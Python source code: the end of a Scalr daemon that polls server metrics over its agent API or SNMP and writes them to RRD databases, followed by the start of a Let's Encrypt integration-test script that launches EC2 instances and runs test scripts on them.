'RRA:AVERAGE:0.5:24:800',
'RRA:AVERAGE:0.5:288:800',
'RRA:MAX:0.5:1:800',
'RRA:MAX:0.5:6:800',
'RRA:MAX:0.5:24:800',
'RRA:MAX:0.5:288:800',
'RRA:LAST:0.5:1:800',
'RRA:LAST:0.5:6:800',
'RRA:LAST:0.5:24:800',
'RRA:LAST:0.5:288:800'
]
CONFIG = {
'farm_procs':1,
'serv_thrds':30,
'rrd_thrds':2,
'with_snmp':False,
'no_daemon':False,
'metrics':['cpu', 'la', 'mem', 'net'],
'instances_connection_policy':'public',
'instances_connection_timeout':10,
'rrd_db_dir':'/tmp/rrd_db_dir',
'pid_file':'/var/run/scalr.stats-poller.pid',
'log_file':'/var/log/scalr.stats-poller.log',
'verbosity':1,
'interval':None
}
LOG = logging.getLogger('ScalrPy')
def post_processing(results):
""" Calculating role average, farm average, role servers summary, farm servers summary """
ra = {}
fa = {}
ras = {}
fas = {}
rs = {}
fs = {}
for result in results:
if not result:
continue
try:
r_key = '%s/%s' % (result['farm_id'], result['farm_role_id'])
f_key = '%s' % result['farm_id']
ra.setdefault(r_key, {})
fa.setdefault(f_key, {})
ras.setdefault(r_key, {})
fas.setdefault(f_key, {})
try:
rs[r_key]['servers']['s_running'] += 1
except KeyError:
rs.setdefault(r_key, {'servers':{'s_running':1}})
try:
fs[f_key]['servers']['s_running'] += 1
except KeyError:
fs.setdefault(f_key, {'servers':{'s_running':1}})
for metric_group, metrics in result['data'].iteritems():
ra[r_key].setdefault(metric_group, {})
fa[f_key].setdefault(metric_group, {})
ras[r_key].setdefault(metric_group, {})
fas[f_key].setdefault(metric_group, {})
for metric, value in metrics.iteritems():
ra[r_key][metric_group].setdefault(metric, None)
fa[f_key][metric_group].setdefault(metric, None)
ras[r_key][metric_group].setdefault(metric, 0)
fas[f_key][metric_group].setdefault(metric, 0)
if value is not None:
ras[r_key][metric_group][metric] += 1
if ra[r_key][metric_group][metric] is None:
ra[r_key][metric_group][metric] = value
else:
k = float(ras[r_key][metric_group][metric]-1) /\
float(ras[r_key][metric_group][metric])
ra[r_key][metric_group][metric] = \
ra[r_key][metric_group][metric] * k + value /\
ras[r_key][metric_group][metric]
fas[f_key][metric_group][metric] += 1
if fa[f_key][metric_group][metric] is None:
fa[f_key][metric_group][metric] = value
else:
k = float(fas[f_key][metric_group][metric]-1) /\
float(fas[f_key][metric_group][metric])
fa[f_key][metric_group][metric] = \
fa[f_key][metric_group][metric] * k + value /\
fas[f_key][metric_group][metric]
except:
LOG.error(helper.exc_info())
return ra, fa, rs, fs
def server_thread(args):
try:
task, rrd_pool = args
if not task:
return
try:
host = task['host']
port = task['api_port']
key = task['srz_key']
os_type = task['os_type']
metrics = task['metrics']
proxy = task['proxy']
data = ScalarizrAPI.get(
host=host, port=port, key=key, os_type=os_type, metrics=metrics, proxy=proxy)
except:
LOG.warning('%s:%s scalarizr api failed: %s'
% (task['host'], task['api_port'], helper.exc_info()))
if CONFIG['with_snmp']:
try:
host = task['host']
port = task['snmp_port']
community = task['community']
metrics = task['metrics']
data = SNMP.get(host=host, port=port, community=community, metrics=metrics)
except:
LOG.warning('%s SNMP failed: %s' % (task['host'], helper.exc_info()))
return
else:
return
key = '%s/%s/%s' % (task['farm_id'], task['farm_role_id'], task['index'])
rrd_pool.map_async(RRDWorker().work, [{'server':{key:data}}])
result = {'farm_id':task['farm_id'], 'farm_role_id':task['farm_role_id'],
'index':task['index'], 'data':data}
except:
LOG.error(helper.exc_info())
result = None
return result
def farm_process(tasks):
if not tasks:
return
try:
servs_pool = pool.ThreadPool(processes=CONFIG['serv_thrds'])
rrd_pool = pool.ThreadPool(processes=CONFIG['rrd_thrds'])
results = servs_pool.map(server_thread, [(t, rrd_pool) for t in tasks])
servs_pool.close()
if not results:
return
ra, fa, rs, fs = post_processing(results)
for k, v in ra.iteritems():
rrd_pool.map_async(RRDWorker().work, [{'ra':{k:v}}])
for k, v in fa.iteritems():
rrd_pool.map_async(RRDWorker().work, [{'fa':{k:v}}])
for k, v in rs.iteritems():
rrd_pool.map_async(RRDWorker().work, [{'rs':{k:v}}])
for k, v in fs.iteritems():
rrd_pool.map_async(RRDWorker().work, [{'fs':{k:v}}])
except:
LOG.error(helper.exc_info())
finally:
servs_pool.close()
servs_pool.join()
rrd_pool.close()
rrd_pool.join()
class StatsPoller(basedaemon.BaseDaemon):
def __init__(self):
super(StatsPoller, self).__init__(pid_file=CONFIG['pid_file'])
self._db_manager = dbmanager.DBManager(CONFIG['connections']['mysql'], autoflush=False)
def __call__(self):
try:
tasks = self._produce_tasks()
if tasks:
self._process_tasks(tasks)
except db_exc.SQLAlchemyError:
LOG.error(helper.exc_info())
except:
LOG.exception('Exception')
def run(self):
while True:
start_time = time.time()
LOG.info('Start iteration')
p = mp.Process(target=self.__call__, args=())
p.start()
p.join(300)
if p.is_alive():
LOG.error('Timeout. Terminating ...')
try:
helper.kill_ps(p.pid, child=True)
except:
LOG.exception('Exception')
p.terminate()
LOG.info('Working time: %s' % (time.time() - start_time))
if not CONFIG['interval']:
break
sleep_time = start_time + CONFIG['interval'] - time.time()
if sleep_time > 0:
time.sleep(sleep_time)
def start(self, daemon=False):
if daemon:
super(StatsPoller, self).start()
else:
self.run()
def restart(self, daemon=False):
self.stop()
self.start(daemon=daemon)
def _get_clients(self):
db = self._db_manager.get_db()
clients = db.session.query(db.clients.id).filter_by(status='Active')
return clients
def _get_farms(self, clients_id):
db = self._db_manager.get_db()
farms = db.session.query(
db.farms.id, db.farms.hash).filter(
db.farms.clientid.in_(clients_id))
return farms
def _filter_vpc_farms(self, farms_id):
db = self._db_manager.get_db()
where = and_(
db.farm_settings.farmid.in_(farms_id),
db.farm_settings.name=='ec2.vpc.id',
db.farm_settings.value!='NULL')
return [farm.farmid for farm in \
db.session.query(db.farm_settings.farmid).filter(where)]
def _get_vpc_router_roles(self, farms_id):
db = self._db_manager.get_db()
where = and_(
db.role_behaviors.behavior=='router')
vpc_roles = db.session.query(db.role_behaviors.role_id).filter(where)
where = and_(
db.farm_roles.role_id.in_([behavior.role_id for behavior in vpc_roles]),
db.farm_roles.farmid.in_(farms_id))
return dict((el.farmid, el.id) for el in db.session.query(
db.farm_roles.farmid, db.farm_roles.id).filter(where))
def _get_servers(self, farms_id):
db = self._db_manager.get_db()
servers = db.session.query(db.servers.server_id, db.servers.farm_id,
db.servers.farm_roleid, db.servers.index, db.servers.remote_ip,
db.servers.local_ip, db.servers.env_id, db.servers.os_type).filter(and_(
db.servers.farm_id.in_(farms_id),
db.servers.status=='Running'))
return servers
def _get_env_statuses(self, environments_id):
db = self._db_manager.get_db()
statuses = db.session.query(
db.client_environments.id, db.client_environments.status).filter(
db.client_environments.id.in_(environments_id))
return statuses
def _get_snmp_ports(self, servers_id):
db = self._db_manager.get_db()
where_port = and_(
db.server_properties.server_id.in_(servers_id),
db.server_properties.name=='scalarizr.snmp_port',
db.server_properties.value!='NULL')
snmp_ports = db.session.query(db.server_properties.server_id,
db.server_properties.value).filter(where_port)
return snmp_ports
def _get_api_ports(self, servers_id):
db = self._db_manager.get_db()
where_port = and_(
db.server_properties.server_id.in_(servers_id),
db.server_properties.name=='scalarizr.api_port',
db.server_properties.value!='NULL')
api_ports = db.session.query(db.server_properties.server_id,
db.server_properties.value).filter(where_port)
return api_ports
def _get_srz_keys(self, servers_id):
db = self._db_manager.get_db()
where_key = and_(
db.server_properties.server_id.in_(servers_id),
db.server_properties.name=='scalarizr.key',
db.server_properties.value!='NULL',
db.server_properties.value!='')
srz_keys = db.session.query(db.server_properties.server_id,
db.server_properties.value).filter(where_key)
return srz_keys
def _produce_tasks(self):
tasks = []
db = self._db_manager.get_db()
try:
clients = self._get_clients()
if not clients:
return
farms = self._get_farms([client.id for client in clients])
if not farms:
return
servers = self._get_servers([farm.id for farm in farms])
if not servers:
return
servers_id = [server.server_id for server in servers]
vpc_farms_id = self._filter_vpc_farms([farm.id for farm in farms])
vpc_router_roles = self._get_vpc_router_roles(vpc_farms_id)
env_statuses = dict((el.id, el.status)
for el in self._get_env_statuses([server.env_id for server in servers]))
api_ports = dict((el.server_id, el.value)
for el in self._get_api_ports(servers_id))
srz_keys = dict((el.server_id, el.value)
for el in self._get_srz_keys(servers_id))
snmp_ports = dict((el.server_id, el.value)
for el in self._get_snmp_ports(servers_id))
communities = dict((farm.id, farm.hash) for farm in farms)
for server in servers:
try:
if env_statuses[server.env_id] != 'Active':
continue
ip = {
'public':server.remote_ip,
'local':server.local_ip,
'auto':server.remote_ip
if server.remote_ip else server.local_ip
}[CONFIG['instances_connection_policy']]
if server.os_type == 'linux':
metrics = CONFIG['metrics']
elif server.os_type == 'windows':
metrics = [metric for metric in CONFIG['metrics'] if metric != 'la']
task = {
'farm_id':server.farm_id,
'farm_role_id':server.farm_roleid,
'index':server.index,
'metrics':metrics}
try:
task['srz_key'] = srz_keys[server.server_id]
except:
LOG.warning('Scalarizr key not found for server %s' % server.server_id)
try:
task['api_port'] = api_ports[server.server_id]
except:
task['api_port'] = 8010
task['proxy'] = None
task['os_type'] = server.os_type
if server.farm_id in vpc_farms_id:
if server.farm_id in vpc_router_roles:
if server.remote_ip:
ip = server.remote_ip
else:
where = and_(
db.farm_role_settings.farm_roleid==vpc_router_roles[server.farm_id],
db.farm_role_settings.name=='router.vpc.ip',
db.farm_role_settings.value!='NULL')
ip_query = db.session.query(
db.farm_role_settings.value).filter(where).first()
if ip_query:
ip = None
headers = {
'X-Receiver-Host':server.local_ip,
'X-Receiver-Port':task['api_port']}
task['proxy'] = {
'headers':headers,
'host':ip_query.value,
'port':80}
else:
continue
else:
if server.os_type != 'windows':
task['community'] = communities[server.farm_id]
try:
task['snmp_port'] = snmp_ports[server.server_id]
except:
task['snmp_port'] = 161
task['host'] = ip
tasks.append(task)
except:
LOG.error(helper.exc_info())
finally:
db.session.remove()
return tasks
def _compose_tasks(self, tasks):
farm_tasks = {}
for task in tasks:
farm_tasks.setdefault(task['farm_id'], []).append(task)
chunks = [[]]
chunk_length = len(tasks) / CONFIG['farm_procs']
for tasks_ in farm_tasks.values():
if len(chunks[-1]) >= chunk_length:
chunks.append([])
chunks[-1] += tasks_
return chunks
def _process_tasks(self, tasks):
chunks = self._compose_tasks(tasks)
if not chunks:
return
farms_pool = mp.Pool(processes=CONFIG['farm_procs'])
try:
farms_pool.map_async(farm_process, chunks)
finally:
farms_pool.close()
farms_pool.join()
class SNMP(object):
@staticmethod
def get(host=None, port=None, community=None, metrics=None):
assert host and port and community and metrics
oids = []
for k, v in oids_data.iteritems():
if k in metrics:
for kk, vv in v.iteritems():
oids.append(vv)
import netsnmp
session = netsnmp.Session(
DestHost = '%s:%s' %(host, port),
Version = 1,
Community = community,
Timeout=2000000)
Vars = netsnmp.VarList(*oids)
snmp_data = dict((oid, val) for oid, val in zip(oids, session.get(Vars)))
data = {}
for metric_name in metrics:
if metric_name not in oids_data:
continue
for metric in oids_data[metric_name].keys():
try:
value = float(snmp_data[oids_data[metric_name][metric]])
except:
value = None
data.setdefault(metric_name, {}).setdefault(metric, value)
return data
class ScalarizrAPI(object):
@staticmethod
def _get_cpu_stat(hsp, api_type):
if api_type not in ['linux', 'windows']:
raise Exception('CPU stat, unsupported api type: %s' % api_type)
timeout = CONFIG['instances_connection_timeout']
cpu = hsp.sysinfo.cpu_stat(timeout=timeout)
for k, v in cpu.iteritems():
cpu[k] = float(v)
return {'cpu':cpu}
@staticmethod
def _get_la_stat(hsp, api_type):
if api_type != 'linux':
raise Exception('LA stat, unsupported api type: %s' % api_type)
timeout = CONFIG['instances_connection_timeout']
la = hsp.sysinfo.load_average(timeout=timeout)
return {'la':{'la1':float(la[0]), 'la5':float(la[1]), 'la15':float(la[2])}}
@staticmethod
def _get_mem_info(hsp, api_type):
if api_type not in ['linux', 'windows']:
raise Exception('MEM info, unsupported api type: %s' % api_type)
timeout = CONFIG['instances_connection_timeout']
mem = hsp.sysinfo.mem_info(timeout=timeout)
if api_type == 'linux':
ret = {
'swap':float(mem['total_swap']),
'swapavail':float(mem['avail_swap']),
'total':float(mem['total_real']),
'avail':None, # FIXME
'free':float(mem['total_free']),
'shared':float(mem['shared']),
'buffer':float(mem['buffer']),
'cached':float(mem['cached'])
}
elif api_type == 'windows':
ret = {
'swap':float(mem['total_swap']),
'swapavail':float(mem['avail_swap']),
'total':float(mem['total_real']),
'avail':None, # FIXME
'free':float(mem['total_free'])
}
else:
raise Exception('Unsupported api type: %s' % api_type)
return {'mem':ret}
@staticmethod
def _get_net_stat(hsp, api_type):
if api_type not in ['linux', 'windows']:
raise Exception('NET stat, unsupported api type: %s' % api_type)
timeout = CONFIG['instances_connection_timeout']
net = hsp.sysinfo.net_stats(timeout=timeout)
if api_type == 'linux':
ret = {'net':{
'in':float(net['eth0']['receive']['bytes']),
'out':float(net['eth0']['transmit']['bytes'])}}
if api_type == 'windows':
for key in net:
if re.match(r'^.* Ethernet Adapter _0$', key):
ret = {'net':{
'in':float(net[key]['receive']['bytes']),
'out':float(net[key]['transmit']['bytes'])}}
break
else:
raise Exception('Can\'t find \'* Ethernet Adapter _0\' pattern in api response')
return ret
@staticmethod
def get(host=None, port=None, key=None, os_type=None, metrics=None, proxy=None):
assert (host or proxy) and port and key and os_type and metrics
if proxy:
host = proxy['host']
port = proxy['port']
headers = proxy['headers']
else:
headers = None
endpoint = 'http://%s:%s' % (host, port)
security = rpc.Security(cryptotool.decrypt_key(key))
hsp = rpc.HttpServiceProxy(endpoint, security=security, headers=headers)
data = dict()
if 'cpu' in metrics:
try:
data.update(ScalarizrAPI._get_cpu_stat(hsp, os_type))
except Exception as e:
if type(e) in (urllib2.URLError, socket.timeout): raise e
LOG.warning('%s:%s scalarizr api CPU failed: %s'
% (host, port, helper.exc_info()))
if 'la' in metrics:
try:
data.update(ScalarizrAPI._get_la_stat(hsp, os_type))
except Exception as e:
if type(e) in (urllib2.URLError, socket.timeout): raise e
LOG.warning('%s:%s scalarizr api LA failed: %s'
% (host, port, helper.exc_info()))
if 'mem' in metrics:
try:
data.update(ScalarizrAPI._get_mem_info(hsp, os_type))
except Exception as e:
if type(e) in (urllib2.URLError, socket.timeout): raise e
LOG.warning('%s:%s scalarizr api MEM failed: %s'
% (host, port, helper.exc_info()))
if 'net' in metrics:
try:
data.update(ScalarizrAPI._get_net_stat(hsp, os_type))
except Exception as e:
if type(e) in (urllib2.URLError, socket.timeout): raise e
LOG.warning('%s:%s scalarizr api NET failed: %s'
% (host, port, helper.exc_info()))
return data
class RRDWriter(object):
def __init__(self, source, archive):
self.source = source
self.archive = archive
def _create_db(self, rrd_db_path):
if not os.path.exists(os.path.dirname(rrd_db_path)):
os.makedirs(os.path.dirname(rrd_db_path))
rrdtool.create(rrd_db_path, self.source, self.archive)
def write(self, rrd_db_path, data):
rrd_db_path = str(rrd_db_path)
if not os.path.isfile(rrd_db_path):
self._create_db(rrd_db_path)
data_to_write = 'N'
for s in self.source:
data_type = {'COUNTER':int, 'GAUGE':float}[s.split(':')[2]]
try:
data_to_write += ':%s' % (data_type)(data[s.split(':')[1]])
except:
data_to_write += ':U'
LOG.debug('%s, %s, %s' %(time.time(), rrd_db_path, data_to_write))
try:
rrdtool.update(rrd_db_path, "--daemon", "unix:/var/run/rrdcached.sock", data_to_write)
except rrdtool.error, e:
LOG.error('RRDTool update error:%s, %s' %(e, rrd_db_path))
class RRDWorker(object):
writers = {
'cpu':RRDWriter(cpu_source, cpu_archive),
'la':RRDWriter(la_source, la_archive),
'mem':RRDWriter(mem_source, mem_archive),
'net':RRDWriter(net_source, net_archive),
'servers':RRDWriter(servers_num_source, servers_num_archive)}
def _x1x2(self, farm_id):
i = int(farm_id[-1])-1
x1 = str(i-5*(i/5)+1)[-1]
x2 = str(i-5*(i/5)+6)[-1]
return 'x%sx%s' % (x1, x2)
def _process_server_task(self, task):
for key, data in task.iteritems():
farm_id, farm_role_id, index = key.split('/')
for metrics_group_name, metrics_group in data.iteritems():
RRDWorker.writers[metrics_group_name].write(
'%s/%s/%s/INSTANCE_%s_%s/%sSNMP/db.rrd'\
% (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id, farm_role_id,
index, metrics_group_name.upper()), metrics_group)
def _process_ra_task(self, task):
for key, data in task.iteritems():
farm_id, farm_role_id = key.split('/')
for metrics_group_name, metrics_group in data.iteritems():
RRDWorker.writers[metrics_group_name].write(
'%s/%s/%s/FR_%s/%sSNMP/db.rrd'\
% (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id, farm_role_id,
metrics_group_name.upper()), metrics_group)
def _process_fa_task(self, task):
for key, data in task.iteritems():
farm_id = key
for metrics_group_name, metrics_group in data.iteritems():
RRDWorker.writers[metrics_group_name].write(
'%s/%s/%s/FARM/%sSNMP/db.rrd'\
% (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id,
metrics_group_name.upper()), metrics_group)
def _process_rs_task(self, task):
for key, data in task.iteritems():
farm_id, farm_role_id = key.split('/')
for metrics_group_name, metrics_group in data.iteritems():
RRDWorker.writers[metrics_group_name].write(
'%s/%s/%s/FR_%s/SERVERS/db.rrd'\
% (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id, farm_role_id),
metrics_group)
def _process_fs_task(self, task):
for key, data in task.iteritems():
farm_id = key
for metrics_group_name, metrics_group in data.iteritems():
RRDWorker.writers[metrics_group_name].write(
'%s/%s/%s/FARM/SERVERS/db.rrd'\
% (CONFIG['rrd_db_dir'], self._x1x2(farm_id), farm_id), metrics_group)
def work(self, task):
try:
task_name = task.keys()[0]
if task_name == 'server':
self._process_server_task(task[task_name])
elif task_name == 'ra':
self._process_ra_task(task[task_name])
elif task_name == 'fa':
self._process_fa_task(task[task_name])
elif task_name == 'rs':
self._process_rs_task(task[task_name])
elif task_name == 'fs':
self._process_fs_task(task[task_name])
except:
LOG.error(helper.exc_info())
def configure(args, config):
global CONFIG
if 'instances_connection_policy' in config:
CONFIG['instances_connection_policy'] = config['instances_connection_policy']
if 'system' in config and 'instances_connection_timeout' in config['system']:
CONFIG['instances_connection_timeout'] = config['system']['instances_connection_timeout']
if 'stats_poller' not in config:
raise Exception("Can't find 'stats_poller' section in %s" % args.config_file)
for k, v in config['stats_poller'].iteritems():
CONFIG.update({k:v})
for k, v in vars(args).iteritems():
if v is not None:
CONFIG.update({k:v})
log_size = 1024*500 if CONFIG['verbosity'] < 2 else 1024*10000
helper.configure_log(
log_level=CONFIG['verbosity'],
log_file=CONFIG['log_file'],
log_size=log_size
)
def main():
sys.stderr.write("This script is deprecated. Instead use load_statistics.py\n\n")
parser = argparse.ArgumentParser()
group = parser.add_mutually_exclusive_group()
group.add_argument('--start', action='store_true', default=False, help='start daemon')
group.add_argument('--stop', action='store_true', default=False, help='stop daemon')
group.add_argument('--restart', action='store_true', default=False, help='restart daemon')
parser.add_argument('--no-daemon', action='store_true', default=None,
help="Run in no daemon mode")
parser.add_argument('--with-snmp', action='store_true', default=None,
help="Use snmp")
parser.add_argument('-i', '--interval', type=int, default=None,
help="execution interval in seconds. Default is 0 - exec once")
parser.add_argument('-p', '--pid-file', default=None, help="Pid file")
parser.add_argument('-l', '--log-file', default=None, help="Log file")
parser.add_argument('-m', '--metrics', default=None, choices=['cpu', 'la', 'mem', 'net'],
action='append', help="metrics type for processing")
parser.add_argument('-c', '--config-file', default='./config.yml', help='config file')
parser.add_argument('-t', '--instances-connection-timeout', type=int, default=None,
help='instances connection timeout')
parser.add_argument('-v', '--verbosity', default=None, action='count',
help='increase output verbosity [0:4]. Default is 1 - Error')
parser.add_argument('--version', action='version', version='Version %s' % __version__)
args = parser.parse_args()
try:
config = yaml.safe_load(open(args.config_file))['scalr']
configure(args, config)
except:
if args.verbosity > 3:
raise
else:
sys.stderr.write('%s\n' % helper.exc_info())
sys.exit(1)
try:
socket.setdefaulttimeout(CONFIG['instances_connection_timeout'])
daemon = StatsPoller()
if args.start:
LOG.info('Start')
if helper.check_pid(CONFIG['pid_file']):
LOG.info('Another copy of process already running. Exit')
sys.exit(0)
daemon.start(daemon= not args.no_daemon)
elif args.stop:
LOG.info('Stop')
daemon.stop()
elif args.restart:
LOG.info('Restart')
daemon.restart(daemon= not args.no_daemon)
else:
print 'Usage %s -h' % sys.argv[0]
LOG.info('Exit')
except KeyboardInterrupt:
LOG.critical(helper.exc_info())
helper.kill_ps(mp.current_process().pid, child=True)
sys.exit(0)
except SystemExit:
pass
except Exception:
LOG.critical('Something happened and I think I died')
LOG.exception('Critical exception')
sys.exit(1)
if __name__ == '__main__':
main()
|
multitester.py | """
Letsencrypt Integration Test Tool
- Configures (canned) boulder server
- Launches EC2 instances with a given list of AMIs for different distros
- Copies letsencrypt repo and puts it on the instances
- Runs letsencrypt tests (bash scripts) on all of these
- Logs execution and success/fail for debugging
Notes:
- Some AWS images, e.g. official CentOS and FreeBSD images
require acceptance of user terms on the AWS marketplace
website. This can't be automated.
- AWS EC2 has a default limit of 20 t2/t1 instances, if more
are needed, they need to be requested via online webform.
Usage:
- Requires AWS IAM secrets to be set up with aws cli
- Requires an AWS associated keyfile <keyname>.pem
>aws configure --profile HappyHacker
[interactive: enter secrets for IAM role]
>aws ec2 create-key-pair --profile HappyHacker --key-name MyKeyPair \
--query 'KeyMaterial' --output text > MyKeyPair.pem
then:
>python multitester.py targets.yaml MyKeyPair.pem HappyHacker scripts/test_letsencrypt_auto_venv_only.sh
see:
https://docs.aws.amazon.com/cli/latest/userguide/cli-chap-getting-started.html
https://docs.aws.amazon.com/cli/latest/userguide/cli-ec2-keypairs.html
"""
from __future__ import print_function
from __future__ import with_statement
import sys, os, time, argparse, socket
import multiprocessing as mp
from multiprocessing import Manager
import urllib2
import yaml
import boto3
import fabric
from fabric.api import run, execute, local, env, sudo, cd, lcd
from fabric.operations import get, put
from fabric.context_managers import shell_env
# Command line parser
#-------------------------------------------------------------------------------
parser = argparse.ArgumentParser(description='Builds EC2 cluster for testing.')
parser.add_argument('config_file',
help='yaml configuration file for AWS server cluster')
parser.add_argument('key_file',
help='key file (<keyname>.pem) for AWS')
parser.add_argument('aws_profile',
help='profile for AWS (i.e. as in ~/.aws/certificates)')
parser.add_argument('test_script',
default='test_letsencrypt_auto_certonly_standalone.sh',
help='path of bash script in to deploy and run')
#parser.add_argument('--script_args',
# nargs='+',
# help='space-delimited list of arguments to pass to the bash test script',
# required=False)
parser.add_argument('--repo',
default='https://github.com/letsencrypt/letsencrypt.git',
help='letsencrypt git repo to use')
parser.add_argument('--branch',
default='~',
help='letsencrypt git branch to trial')
parser.add_argument('--pull_request',
default='~',
help='letsencrypt/letsencrypt pull request to trial')
parser.add_argument('--merge_master',
action='store_true',
help="if set merges PR into master branch of letsencrypt/letsencrypt")
parser.add_argument('--saveinstances',
action='store_true',
help="don't kill EC2 instances after run, useful for debugging")
parser.add_argument('--alt_pip',
default='',
help="server from which to pull candidate release packages")
cl_args = parser.parse_args()
# Credential Variables
#-------------------------------------------------------------------------------
# assumes naming: <key_filename> = <keyname>.pem
KEYFILE = cl_args.key_file
KEYNAME = os.path.split(cl_args.key_file)[1].split('.pem')[0]
PROFILE = cl_args.aws_profile
# Globals
#-------------------------------------------------------------------------------
BOULDER_AMI = 'ami-5f490b35' # premade shared boulder AMI 14.04LTS us-east-1
LOGDIR = "" #points to logging / working directory
# boto3/AWS api globals
AWS_SESSION = None
EC2 = None
# Boto3/AWS automation functions
#-------------------------------------------------------------------------------
def make_security_group():
# will fail if security group of GroupName already exists
# cannot have duplicate SGs of the same name
mysg = EC2.create_security_group(GroupName="letsencrypt_test",
Description='security group for automated testing')
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=22, ToPort=22)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=80, ToPort=80)
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=443, ToPort=443)
# for boulder wfe (http) server
mysg.authorize_ingress(IpProtocol="tcp", CidrIp="0.0.0.0/0", FromPort=4000, ToPort=4000)
# for mosh
mysg.authorize_ingress(IpProtocol="udp", CidrIp="0.0.0.0/0", FromPort=60000, ToPort=61000)
return mysg
def make_instance(instance_name,
ami_id,
keyname,
machine_type='t2.micro',
security_groups=['letsencrypt_test'],
userdata=""): #userdata contains bash or cloud-init script
new_instance = EC2.create_instances(
ImageId=ami_id,
SecurityGroups=security_groups,
KeyName=keyname,
MinCount=1,
MaxCount=1,
UserData=userdata,
InstanceType=machine_type)[0]
# brief pause to prevent rare error on EC2 delay, should block until ready instead
time.sleep(1.0)
# give instance a name
new_instance.create_tags(Tags=[{'Key': 'Name', 'Value': instance_name}])
return new_instance
def terminate_and_clean(instances):
"""
Some AMIs specify EBS stores that won't delete on instance termination.
These must be manually deleted after shutdown.
"""
volumes_to_delete = []
for instance in instances:
for bdmap in instance.block_device_mappings:
if 'Ebs' in bdmap.keys():
if not bdmap['Ebs']['DeleteOnTermination']:
volumes_to_delete.append(bdmap['Ebs']['VolumeId'])
for instance in instances:
instance.terminate()
# can't delete volumes until all attaching instances are terminated
_ids = [instance.id for instance in instances]
all_terminated = False
while not all_terminated:
all_terminated = True
for _id in _ids:
# necessary to reinit object for boto3 to get true state
inst = EC2.Instance(id=_id)
if inst.state['Name'] != 'terminated':
all_terminated = False
time.sleep(5)
for vol_id in volumes_to_delete:
volume = EC2.Volume(id=vol_id)
volume.delete()
return volumes_to_delete
# Helper Routines
#-------------------------------------------------------------------------------
def block_until_http_ready(urlstring, wait_time=10, timeout=240):
"Blocks until server at urlstring can respond to http requests"
server_ready = False
t_elapsed = 0
while not server_ready and t_elapsed < timeout:
try:
sys.stdout.write('.')
sys.stdout.flush()
req = urllib2.Request(urlstring)
response = urllib2.urlopen(req)
#if response.code == 200:
server_ready = True
except urllib2.URLError:
pass
time.sleep(wait_time)
t_elapsed += wait_time
def block_until_ssh_open(ipstring, wait_time=10, timeout=120):
"Blocks until server at ipstring has an open port 22"
reached = False
t_elapsed = 0
while not reached and t_elapsed < timeout:
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((ipstring, 22))
reached = True
except socket.error as err:
time.sleep(wait_time)
t_elapsed += wait_time
sock.close()
def block_until_instance_ready(booting_instance, wait_time=5, extra_wait_time=20):
"Blocks booting_instance until AWS EC2 instance is ready to accept SSH connections"
# the reinstantiation from id is necessary to force boto3
# to correctly update the 'state' variable during init
_id = booting_instance.id
_instance = EC2.Instance(id=_id)
_state = _instance.state['Name']
_ip = _instance.public_ip_address
while _state != 'running' or _ip is None:
time.sleep(wait_time)
_instance = EC2.Instance(id=_id)
_state = _instance.state['Name']
_ip = _instance.public_ip_address
block_until_ssh_open(_ip)
time.sleep(extra_wait_time)
return _instance
# Fabric Routines
#-------------------------------------------------------------------------------
def local_git_clone(repo_url):
"clones master of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s'% repo_url)
local('tar czf le.tar.gz letsencrypt')
def local_git_branch(repo_url, branch_name):
"clones branch <branch_name> of repo_url"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s --branch %s --single-branch'%(repo_url, branch_name))
local('tar czf le.tar.gz letsencrypt')
def local_git_PR(repo_url, PRnumstr, merge_master=True):
"clones specified pull request from repo_url and optionally merges into master"
with lcd(LOGDIR):
local('if [ -d letsencrypt ]; then rm -rf letsencrypt; fi')
local('git clone %s'% repo_url)
local('cd letsencrypt && git fetch origin pull/%s/head:lePRtest'%PRnumstr)
local('cd letsencrypt && git co lePRtest')
if merge_master:
local('cd letsencrypt && git remote update origin')
local('cd letsencrypt && git merge origin/master -m "testmerge"')
local('tar czf le.tar.gz letsencrypt')
def local_repo_to_remote():
"copies local tarball of repo to remote"
with lcd(LOGDIR):
put(local_path='le.tar.gz', remote_path='')
run('tar xzf le.tar.gz')
def local_repo_clean():
"delete tarball"
with lcd(LOGDIR):
local('rm le.tar.gz')
def deploy_script(scriptpath, *args):
"copies to remote and executes local script"
#with lcd('scripts'):
put(local_path=scriptpath, remote_path='', mirror_local_mode=True)
scriptfile = os.path.split(scriptpath)[1]
args_str = ' '.join(args)
run('./'+scriptfile+' '+args_str)
def run_boulder():
with cd('$GOPATH/src/github.com/letsencrypt/boulder'):
run('go run cmd/rabbitmq-setup/main.go -server amqp://localhost')
run('nohup ./start.py >& /dev/null < /dev/null &')
def config_and_launch_boulder(instance):
execute(deploy_script, 'scripts/boulder_config.sh')
execute(run_boulder)
def install_and_launch_letsencrypt(instance, boulder_url, target):
execute(local_repo_to_remote)
with shell_env(BOULDER_URL=boulder_url,
PUBLIC_IP=instance.public_ip_address,
PRIVATE_IP=instance.private_ip_address,
PUBLIC_HOSTNAME=instance.public_dns_name,
PIP_EXTRA_INDEX_URL=cl_args.alt_pip,
OS_TYPE=target['type']):
execute(deploy_script, cl_args.test_script)
def grab_letsencrypt_log():
"grabs letsencrypt.log via cat into logged stdout"
sudo('if [ -f /var/log/letsencrypt/letsencrypt.log ]; then \
cat /var/log/letsencrypt/letsencrypt.log; else echo "[novarlog]"; fi')
# fallback file if /var/log is unwriteable...? correct?
sudo('if [ -f ./letsencrypt.log ]; then \
cat ./letsencrypt.log; else echo "[nolocallog]"; fi')
#-------------------------------------------------------------------------------
# SCRIPT BEGINS
#-------------------------------------------------------------------------------
# Fabric library controlled through global env parameters
env.key_filename = KEYFILE
env.shell = '/bin/bash -l -i -c'
env.connection_attempts = 5
env.timeout = 10
# replace default SystemExit thrown by fabric during trouble
class FabricException(Exception):
pass
env['abort_exception'] = FabricException
# Set up local copy of git repo
#-------------------------------------------------------------------------------
